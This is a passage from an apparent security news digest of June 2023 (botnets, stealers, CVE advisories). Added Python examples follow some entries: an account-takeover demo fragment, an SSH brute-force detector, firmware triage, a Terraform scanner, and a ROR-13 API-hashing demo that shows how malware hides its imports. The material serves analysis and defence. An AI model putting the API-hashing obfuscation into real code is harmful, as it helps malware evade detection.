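    return {"vulnerable_takeover": hijacked, "hardened_blocked": is_blocked(hard, ATTACKER_CLAIMS)}


if __name__ == "__main__":
    print(demo())
```

The hardened handler also rejects the victim's own first IdP login into a pre-existing password account, and that is intentional: the verification step is what turns "someone presented this address" into "this person controls this mailbox", for the attacker and the legitimate user alike. Subsequent logins by the same (iss, sub) pair resolve directly.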
June 21, 2023 – Government
New DOJ unit will focus on prosecuting nation-state cybercrime Full Text
Abstract
The decision to put cyber on equal footing with the division’s three existing sections comes as the DOJ has ramped up its own efforts to defeat botnets, contain or eliminate malware outbreaks and pursue digital criminals around the globe.Cyware
June 21, 2023 – Hacker
Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor Full Text
Abstract
Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in a European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group thaThe Hacker News
June 21, 2023 – General
Organizations actively embrace zero trust, integration remains a hurdle Full Text
Abstract
IT teams have made security efforts and progress in zero-trust implementation strategies to establish a new sense of normalcy following the network upheaval caused by the start of the global pandemic.Cyware
June 21, 2023 – Malware
New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text
Abstract
A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot theThe Hacker News
June 21, 2023 – Botnet
Tsunami Botnet Found Targeting Unsecured Linux SSH Servers Full Text
Abstract
An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available.Cyware
June 21, 2023 – Vulnerabilities
Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations Networks Full Text
Abstract
VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887, could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware Aria Operations for Networks versions 6.x, with fixes released in versions 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9, and 6.10 on June 7, 2023. Now according to an update shared by the virtualization services provider on June 20, 2023, the flaw has been weaponized in real-world attacks, although the exact specifics are unknown as yet. "VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild," the company noted. Data gathered by threat intelligence firm GreyNoise shows active exploitation of the flaw from two different IP addresses located in the NetherlThe Hacker News
June 20, 2023 – Vulnerabilities
OT:Icefall: Vulnerabilities Identified in Wago Controllers Full Text
Abstract
The flaws were identified as part of the OT:Icefall research that has led to the public disclosure of 61 vulnerabilities impacting more than 100 OT products from 13 vendors.Cyware
June 20, 2023 – Vulnerabilities
Researchers Expose New Severe Flaws in Wago and Schneider Electric OT Products Full Text
Abstract
Three security vulnerabilities have been disclosed in operational technology (OT) products from Wago and Schneider Electric. The flaws, per Forescout, are part of a broader set of shortcomings collectively called OT:ICEFALL , which now comprises a total of 61 issues spanning 13 different vendors. "OT:ICEFALL demonstrates the need for tighter scrutiny of, and improvements to, processes related to secure design, patching and testing in OT device vendors," the company said in a report shared with The Hacker News. The most severe of the flaws is CVE-2022-46680 (CVSS score: 8.8), which concerns the plaintext transmission of credentials in the ION/TCP protocol used by power meters from Schneider Electric. Successful exploitation of the bug could enable threat actors to gain control of vulnerable devices. It's worth noting that CVE-2022-46680 is one among the 56 flaws originally unearthed by Forescout in June 2022. The other two new security holes ( CVE-2023The Hacker News
June 20, 2023 – Breach
3CX data exposed, third-party to blame Full Text
Abstract
A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data. The issue went under the company’s radar, even though it was recently targeted by North Korean hackers. While...Security Affairs
June 20, 2023 – Denial Of Service
Compromised Linux SSH servers engage in DDoS attacks, cryptomining Full Text
Abstract
A threat actor is mounting dictionary attacks to log into Linux servers with SSH installed and saddle the server with the Tsunami and ShellBot DDoS bots, the XMRig CoinMiner program, and Log Cleaner – a tool for deleting and modifying logs.Cyware
June 20, 2023 – Vulnerabilities
Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices Full Text
Abstract
Zyxel has rolled out security updates to address a critical security flaw in its network-attached storage (NAS) devices that could result in the execution of arbitrary commands on affected systems. Tracked as CVE-2023-27992 (CVSS score: 9.8), the issue has been described as a pre-authentication command injection vulnerability. "The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request," Zyxel said in an advisory published today. Andrej Zaujec, NCSC-FI, and Maxim Suslov have been credited with discovering and reporting the flaw. The following versions are impacted by CVE-2023-27992 - NAS326 (V5.21(AAZF.13)C0 and earlier, patched in V5.21(AAZF.14)C0), NAS540 (V5.21(AATB.10)C0 and earlier, patched in V5.21(AATB.11)C0), and NAS542 (V5.21(ABAG.10)C0 and earlier, patched in V5.21(ABAG.11)C0) The alert comes two weeksThe Hacker News
June 20, 2023 – Botnet
New Tsunami botnet targets Linux SSH servers Full Text
Abstract
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected...Security Affairs
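The three Tsunami/ShellBot entries above all describe the same initial access: dictionary attacks against password-authenticated SSH. The following detector is an added example, not code from ASEC, Cyware or Security Affairs. It parses constructed sshd lines in the Debian auth.log syslog format (the sample is made up, using documentation IP ranges) and flags a source that racks up a burst of failed logins, then checks whether that source also got an "Accepted" login inside the same window, which is the signal that a guessed credential worked. The window and threshold are assumptions a real deployment would tune.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the syslog format Debian-style systems write to
# /var/log/auth.log. Sample data for this example, not a real capture;
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_AUTH_LOG = """\
Jun 20 02:11:03 host sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Jun 20 02:11:05 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
Jun 20 02:11:07 host sshd[2105]: Failed password for root from 203.0.113.7 port 51244 ssh2
Jun 20 02:11:09 host sshd[2107]: Failed password for invalid user oracle from 203.0.113.7 port 51250 ssh2
Jun 20 02:11:11 host sshd[2109]: Failed password for root from 203.0.113.7 port 51256 ssh2
Jun 20 02:11:14 host sshd[2111]: Accepted password for root from 203.0.113.7 port 51260 ssh2
Jun 20 02:30:00 host sshd[2300]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Jun 20 02:30:20 host sshd[2302]: Accepted publickey for alice from 198.51.100.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_events(log_text, year=2023):
    """Turn sshd auth lines into (timestamp, result, method, user, ip) tuples.
    Syslog omits the year, so the caller supplies it (assumed 2023 here)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/PAM noise is ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events


def detect_dictionary_attacks(events, threshold=5, window_s=600):
    """Flag source IPs with >= threshold failed logins inside any window_s-second
    window, and report successful logins from that IP within window_s after the
    burst, which is the signal that a guessed password actually worked."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[4]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
        best, burst_end, lo = 0, None, 0
        for hi in range(len(fails)):                      # sliding window over failures
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 > best:
                best, burst_end = hi - lo + 1, fails[hi][0]
        if best < threshold:
            continue
        logged_in = [
            e[3] for e in evs
            if e[1] == "Accepted" and 0 <= (e[0] - burst_end).total_seconds() <= window_s
        ]
        findings[ip] = {
            "failures_in_window": best,
            "users_tried": sorted({e[3] for e in fails}),
            "successful_logins_after_burst": logged_in,
        }
    return findings


if __name__ == "__main__":
    for ip, report in detect_dictionary_attacks(parse_events(SAMPLE_AUTH_LOG)).items():
        print(ip, report)
```

On the sample, 203.0.113.7 is reported with five failures across root/admin/oracle followed by a successful root password login, while alice's single typo followed by a key login is not. The lasting fix for this whole class of campaigns is to stop accepting passwords at all (`PasswordAuthentication no` in sshd_config) and keep root off SSH; detection like the above is for the hosts where that has not happened yet.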
June 20, 2023 – Phishing
Phishing scam takes $950k from DoorDash drivers Full Text
Abstract
The scam involved placing bogus orders, contacting drivers claiming to be from the DoorDash support team, and convincing them to hand over banking details or log in to a fake portal.Cyware
June 20, 2023 – Solution
SaaS in the Real World: How Global Food Chains Can Secure Their Digital Dish Full Text
Abstract
The Quick Serve Restaurant (QSR) industry is built on consistency and shared resources. National chains like McDonald's and regional ones like Cracker Barrel grow faster by reusing the same business model, decor, and menu, with little change from one location to the next. QSR technology stacks mirror the consistency of the front end of each store. Despite each franchise being independently owned and operated, they share subscriptions to SaaS applications, or use multiple tenants of the same application. Each app is typically segmented by store. Corporate IT and Security has access to the entire database, while each franchise has visibility into its own data. These SaaS apps cover everything from CRMs to supply chains to marketing and HR. The data within is used to understand consumer habits, improve marketing campaigns, and manage employees. Like every other industry, QSR SaaS apps contain a wealth of data that needs to be secured. At the same time, we're seeing food chaThe Hacker News
June 20, 2023 – Vulnerabilities
Zyxel addressed critical flaw CVE-2023-27992 in NAS Devices Full Text
Abstract
Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices. Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting...Security Affairs
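The two Zyxel entries above give the exact vulnerable-and-fixed firmware strings for CVE-2023-27992, which is enough to triage a NAS inventory. The script below is an added example, not Zyxel's or The Hacker News' code: it parses the V5.21(AAZF.13)C0 firmware format, compares against the fixed releases quoted in the advisory, and refuses to guess when the per-model code does not match the model. The ordering it uses (major, minor, build, revision) and the sample inventory are assumptions for the example.

```python
import re

# Vulnerable-to-fixed mapping for CVE-2023-27992 as quoted in the advisory above.
FIXED_IN = {
    "NAS326": "V5.21(AAZF.14)C0",
    "NAS540": "V5.21(AATB.11)C0",
    "NAS542": "V5.21(ABAG.11)C0",
}

# Zyxel NAS firmware strings look like V5.21(AAZF.13)C0: major.minor, a per-model
# code, a build number and a release revision. Ordering by (major, minor, build,
# revision) is an assumption made for this example.
VERSION_RE = re.compile(
    r"^V(?P<major>\d+)\.(?P<minor>\d+)\((?P<code>[A-Z]+)\.(?P<build>\d+)\)C(?P<rev>\d+)$"
)


def parse_version(s):
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Zyxel firmware string: {s!r}")
    return {k: (v if k == "code" else int(v)) for k, v in m.groupdict().items()}


def is_vulnerable(model, version):
    """True if the firmware is older than the fixed release for that model,
    None if the model is not covered by the advisory."""
    if model not in FIXED_IN:
        return None
    have, need = parse_version(version), parse_version(FIXED_IN[model])
    if have["code"] != need["code"]:
        raise ValueError(f"{version} is not {model} firmware (expected code {need['code']})")

    def key(v):
        return (v["major"], v["minor"], v["build"], v["rev"])

    return key(have) < key(need)


def triage(inventory):
    """Return the inventory rows that still need patching or could not be assessed."""
    todo = []
    for host, model, version in inventory:
        try:
            state = is_vulnerable(model, version)
        except ValueError as exc:
            todo.append((host, f"check manually: {exc}"))
            continue
        if state is None:
            todo.append((host, f"{model} not covered by advisory; confirm with vendor"))
        elif state:
            todo.append((host, f"update {model} from {version} to {FIXED_IN[model]}"))
    return todo


# Constructed inventory for the example, not real hosts.
SAMPLE_INVENTORY = [
    ("nas-01", "NAS326", "V5.21(AAZF.13)C0"),
    ("nas-02", "NAS326", "V5.21(AAZF.14)C0"),
    ("nas-03", "NAS542", "V5.20(ABAG.11)C0"),
    ("nas-04", "NAS540", "V5.21(AATB.11)C0"),
    ("nas-05", "NAS326", "V5.21(AATB.10)C0"),   # model/firmware mismatch: flagged for a human
]

if __name__ == "__main__":
    for host, action in triage(SAMPLE_INVENTORY):
        print(host, action)
```

Because the bug is pre-authentication and reachable with one crafted HTTP request, the inventory pass matters more than usual: any NAS on the list whose web interface is exposed beyond the LAN should be treated as already probed.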
June 20, 2023 – Malware
Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text
Abstract
Virustotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).Cyware
June 20, 2023 – Attack
Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer Full Text
Abstract
A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer . "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in questionThe Hacker News
June 20, 2023 – Solution
Tackling Data Sovereignty with DDR Full Text
Abstract
Data-centric distributed resilience (DDR) offers a compelling approach to addressing data sovereignty in cybersecurity. As much of our modern life relies upon the cloud, the question of data protection is front of mind for many organizations. Those...Security Affairs
June 20, 2023 – Vulnerabilities
Western Digital Blocks Unpatched Devices From Cloud Services Full Text
Abstract
The move, which began on June 15, comes one month after the company released firmware updates for its My Cloud product line to address multiple security defects, including a critical path traversal bug that leads to remote code execution (RCE).Cyware
June 20, 2023 – Vulnerabilities
ASUS Releases Patches to Fix Critical Security Bugs Impacting Multiple Router Models Full Text
Abstract
Taiwanese company ASUS on Monday released firmware updates to address, among other issues, nine security bugs impacting a wide range of router models. Of the nine security flaws, two are rated Critical and six are rated High in severity. One vulnerability is currently awaiting analysis. The list of impacted products are GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. Topping the list of fixes are CVE-2018-1160 and CVE-2022-26376 , both of which are rated 9.8 out of a maximum of 10 on the CVSS scoring system. CVE-2018-1160 concerns a nearly five-year-old out-of-bounds write bug in Netatalk versions before 3.1.12 that could allow a remote unauthenticated attacker to achieve arbitrary code execution. CVE-2022-26376 has been described as a memory corruption vulnerability in the Asuswrt firmware that could be triggered by meanThe Hacker News
June 20, 2023 – Vulnerabilities
ASUS addressed critical flaws in some router models Full Text
Abstract
ASUS addressed critical vulnerabilities in multiple router models, urging customers to immediately install firmware updates. ASUS is warning customers to update some router models to the latest firmware to address critical vulnerabilities. The...Security Affairs
June 20, 2023 – Government
Federal Authority Warns Health Sector of TimisoaraHackerTeam Threats Full Text
Abstract
Federal authorities are warning the healthcare sector of an apparent resurgence of TimisoaraHackerTeam threats after a recent attack by the "obscure" ransomware group on a U.S. cancer center.Cyware
June 20, 2023 – Breach
Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces Full Text
Abstract
Over 101,100 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News. "The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said . "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year." Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh. A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealThe Hacker News
June 20, 2023 – Malware
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text
Abstract
Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team , which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said . DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure toThe Hacker News
June 19, 2023 – Outage
Anonymous Sudan and Killnet strike again, target EIB Full Text
Abstract
The EIB‘s main site is currently down, and the bank has just released a Tweet acknowledging the issue as a ‘cyber attack.’ The EIB interconnection infrastructure has been allegedly disrupted.Cyware
June 19, 2023 – Malware
New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text
Abstract
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 coThe Hacker News
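"Hash-based import resolution" in the Mystic Stealer write-up means the binary carries 32-bit hashes of the Windows API names it needs and resolves them at runtime by hashing every export of a loaded DLL until one matches, so the import table and the strings give analysts nothing. The block below is an added example of that technique, not Mystic Stealer's code: it uses the ROR-13 hash popularised by shellcode loaders as a representative algorithm (the page does not say which hash Mystic uses), shows both the author's side (ship hashes only) and the analyst's side (precompute a hash-to-name table and look the embedded values up). The export lists are a constructed subset; in practice they would come from each DLL's export directory.

```python
# Representative API-hashing scheme: ROR-13 over the ASCII export name, the form
# popularised by Windows shellcode loaders. Mystic Stealer's actual hash function
# is not given on this page; this illustrates the technique, not its implementation.

def ror13_hash(name: str) -> int:
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # rotate right by 13 (32-bit)
        h = (h + byte) & 0xFFFFFFFF
    return h


# Constructed export lists for the example. A real table would be built by reading
# the export directory of each DLL (for instance with pefile), not by hand.
KNOWN_EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
                     "CreateFileW", "WriteFile", "ExitProcess"],
    "ws2_32.dll": ["WSAStartup", "socket", "connect", "send", "recv"],
    "advapi32.dll": ["CryptUnprotectData", "RegOpenKeyExW"],
}


def build_hash_table(exports, hash_fn=ror13_hash):
    """Precompute hash -> (dll, export) so hashes pulled from a sample can be named."""
    table = {}
    for dll, names in exports.items():
        for name in names:
            h = hash_fn(name)
            if h in table and table[h] != (dll, name):
                raise ValueError(f"collision: {table[h]} and {(dll, name)} both hash to {h:#010x}")
            table[h] = (dll, name)
    return table


def embed_hashes(names, hash_fn=ror13_hash):
    """The malware author's side: only hashes are shipped, so no API strings exist in the binary."""
    return [hash_fn(n) for n in names]


def resolve_hashes(hashes, table):
    """The analyst's side: map each embedded hash back to a DLL export, or None if unknown."""
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    table = build_hash_table(KNOWN_EXPORTS)
    embedded = embed_hashes(["VirtualAlloc", "connect"]) + [0xDEADBEEF]   # 0xDEADBEEF: unknown hash
    for h, hit in resolve_hashes(embedded, table).items():
        print(f"{h:#010x} -> {hit}")
```

The practical lesson is the same whatever hash a given stealer uses: once the algorithm is recovered from the resolver routine, a table over the exports of the common DLLs turns the obfuscation into a lookup, which is why families rotate or seed their hash functions between builds.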
June 19, 2023 – Malware
Experts found components of a complex toolkit employed in macOS attacks Full Text
Abstract
Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...Security Affairs
June 19, 2023 – Malware
DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text
Abstract
The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, file stealing, credential theft, and ransomware.Cyware
June 19, 2023 – Malware
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text
Abstract
Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed JokerSpy . The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for executThe Hacker News
June 19, 2023 – Government
EU member states are urged to restrict without delay 5G equipment from risky suppliers Full Text
Abstract
The European Commission urges member states to limit “without delay” equipment from Chinese suppliers from their 5G networks, specifically Huawei and ZTE. The European Commission told member states to impose restrictions on high-risk suppliers...Security Affairs
June 19, 2023 – Government
Britain to double cyber defense funding for Ukraine Full Text
Abstract
The United Kingdom on Sunday announced a “major expansion” to its Ukraine Cyber Program, which has seen British experts provide remote incident response support to the Ukrainian government following Russian cyberattacks on critical infrastructure.Cyware
June 19, 2023 – Solution
Introducing AI-guided Remediation for IaC Security / KICS Full Text
Abstract
While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities. IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are typically version-controlled and treated as code. IaC misconfigurations are mistakes, or oversights, in the configuration of infrastructure resources and environments that happen when using IaC tools and frameworks. Misconfigurations in IaC caThe Hacker News
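The KICS piece stays at the level of "misconfigurations are mistakes in machine-readable infrastructure files", so here is what such a scanner actually does, as an added example that is not KICS or Checkmarx code. It reads a small constructed Terraform JSON-syntax document (the `resource` block layout of a main.tf.json), applies three rule families a real tool would ship (public S3 ACL, security group with port 22 open to the world, unencrypted or publicly reachable database), and applies the fixes that have a single safe value while leaving the open-SSH rule for a person, because the right source range is a design decision. The rule IDs and the sample configuration are invented for the example.

```python
import json

# Constructed Terraform JSON-syntax configuration (what a main.tf.json would hold);
# sample input for this example, not taken from any real repository.
SAMPLE_TF_JSON = """
{
  "resource": {
    "aws_s3_bucket": {
      "logs": {"bucket": "example-logs", "acl": "public-read"},
      "data": {"bucket": "example-data", "acl": "private"}
    },
    "aws_security_group": {
      "admin": {
        "name": "admin",
        "ingress": [
          {"from_port": 22, "to_port": 22, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
          {"from_port": 443, "to_port": 443, "protocol": "tcp", "cidr_blocks": ["10.0.0.0/8"]}
        ]
      }
    },
    "aws_db_instance": {
      "app": {"engine": "postgres", "storage_encrypted": false, "publicly_accessible": true}
    }
  }
}
"""

ANY_ADDRESS = {"0.0.0.0/0", "::/0"}
PUBLIC_ACLS = {"public-read", "public-read-write"}


def iter_resources(cfg):
    """Yield (type, address, body) for every resource instance in a Terraform JSON document."""
    for rtype, instances in cfg.get("resource", {}).items():
        for name, body in instances.items():
            yield rtype, f"{rtype}.{name}", body


def check_resource(rtype, body):
    """Return (rule_id, message) pairs for one resource block. Rule IDs are invented here."""
    out = []
    if rtype == "aws_s3_bucket" and body.get("acl") in PUBLIC_ACLS:
        out.append(("S3_PUBLIC_ACL", f"acl={body['acl']} lets anonymous users read the bucket"))
    if rtype == "aws_security_group":
        for rule in body.get("ingress", []):
            cidrs = set(rule.get("cidr_blocks", [])) | set(rule.get("ipv6_cidr_blocks", []))
            if cidrs & ANY_ADDRESS and rule.get("from_port", 0) <= 22 <= rule.get("to_port", 65535):
                out.append(("SG_SSH_OPEN", "port 22 ingress allowed from the whole internet"))
    if rtype == "aws_db_instance":
        if not body.get("storage_encrypted", False):
            out.append(("RDS_UNENCRYPTED", "storage_encrypted is not true"))
        if body.get("publicly_accessible", False):
            out.append(("RDS_PUBLIC", "publicly_accessible is true"))
    return out


def scan(tf_json_text):
    """Scan a Terraform JSON document; returns [(rule_id, resource_address, message)]."""
    cfg = json.loads(tf_json_text)
    return [(rule, addr, msg)
            for rtype, addr, body in iter_resources(cfg)
            for rule, msg in check_resource(rtype, body)]


def remediate(tf_json_text):
    """Apply only the fixes with an unambiguous safe value and return the new document.
    The open SSH rule is deliberately left alone: choosing the source range is a human call."""
    cfg = json.loads(tf_json_text)
    for rtype, _, body in iter_resources(cfg):
        if rtype == "aws_s3_bucket" and body.get("acl") in PUBLIC_ACLS:
            body["acl"] = "private"
        if rtype == "aws_db_instance":
            body["storage_encrypted"] = True
            body["publicly_accessible"] = False
    return json.dumps(cfg, indent=2)


if __name__ == "__main__":
    for finding in scan(SAMPLE_TF_JSON):
        print("before:", finding)
    for finding in scan(remediate(SAMPLE_TF_JSON)):
        print("after: ", finding)
```

Running the scan before and after remediation shows the pattern any IaC scanner follows: the document is parsed, not executed; findings are anchored to a resource address so they can be reported in a pull request; and only the subset of fixes with one correct answer is safe to automate.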
June 19, 2023 – Criminals
Diicot cybercrime gang expands its attack capabilities Full Text
Abstract
Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...Security Affairs
June 19, 2023 – Vulnerabilities
Third Bug in MOVEit Transfer Found Full Text
Abstract
Progress Software has reported a third vulnerability in its MOVEit Transfer application. The bug, which still awaits a CVE identifier, is an SQL injection vulnerability. The company strongly advised customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443. This precaut ...Cyware
June 19, 2023 – Hacker
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments Full Text
Abstract
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services ( IIS ) and Microsoft Exchange servers to infiltrate target networks. Palo Alto Networks said it deteThe Hacker News
June 19, 2023 – Business
Content Moderation Tech Startup Trust Lab Snags $15M Investment Full Text
Abstract
The Palo Alto company said the $15 million Series A was led by U.S. Venture Partners (USVP) and Foundation Capital, two prominent investment firms betting on cybersecurity startups.Cyware
June 19, 2023 – Denial Of Service
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions Full Text
Abstract
Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorized cluster it tracks under the name Storm-1359 . "These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools," the tech giant said in a post on Friday. Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn't been definitively established yet. While there is no evidence that any customer data was accessed or compromised, the company noted the attacks "temporarily impacted availability" of some services. Redmond said it further observed the threat actor launching layer 7 DDoS attacks from multiple cloud services and open proxy infrastructures. This includes HTTP(S) flood attacks, which bombard the target services with aThe Hacker News
June 18, 2023 – Outage
Microsoft: June Outlook and cloud platform outages were caused by DDoS Full Text
Abstract
